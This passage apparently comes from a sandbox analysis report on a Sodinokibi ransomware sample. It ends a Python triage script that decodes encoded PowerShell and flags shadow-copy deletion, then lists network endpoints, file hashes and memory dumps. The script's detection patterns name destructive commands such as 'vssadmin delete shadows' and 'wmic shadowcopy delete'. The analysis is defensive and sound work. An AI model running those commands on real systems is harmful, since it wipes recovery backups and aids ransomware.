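    via_wmi = "win32_shadowcopy" in s and ".delete(" in s
    # Other common routes (hypothetical here; not observed in this report).
    via_vssadmin = re.search(r"vssadmin(\.exe)?\s+delete\s+shadows", s) is not None
    via_wmic = re.search(r"wmic(\.exe)?\s+shadowcopy\s+delete", s) is not None
    return via_wmi or via_vssadmin or via_wmic


def triage_powershell(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and flag recovery inhibition."""
    decoded = decode_encoded_command(cmdline)
    return {
        "decoded": decoded,
        "inhibits_recovery": bool(decoded) and is_shadow_copy_deletion(decoded),
    }


if __name__ == "__main__":
    result = triage_powershell(SAMPLE_CMDLINE)
    print("decoded :", result["decoded"])
    print("shadow copy deletion:", result["inhibits_recovery"])
```

Run stand-alone it prints the decoded Get-WmiObject pipeline and True. The decode step is the part worth keeping in any process-creation detection: a rule that only looks at the raw command line never sees the string Win32_Shadowcopy.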

Network

Country Destination Domain Proto
US 8.8.8.8:53 164.113.223.173.in-addr.arpa udp
US 40.125.122.151:443 tcp
US 8.8.8.8:53 14.103.197.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 20.42.65.85:443 tcp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp

No domain is resolved for any of the TCP connections and no Sodinokibi command-and-control traffic is identified in the 183 s window; the in-addr.arpa rows are reverse (PTR) lookups sent to 8.8.8.8. Treat the listed endpoints as unattributed until they have been compared against a clean run of the same win10v2004 image.

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkgtrjbf.x5r.ps1 (written by powershell.exe at startup to test whether script enforcement such as AppLocker applies; the random infix changes per run, so the hashes below are not useful as indicators)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Memory region dumps of PID 1164 (sandbox process id, dump index, start and end address of the dumped range):

memory/1164-138-0x000001E4A3760000-0x000001E4A3782000-memory.dmp

memory/1164-143-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-144-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-145-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-146-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-147-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-148-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp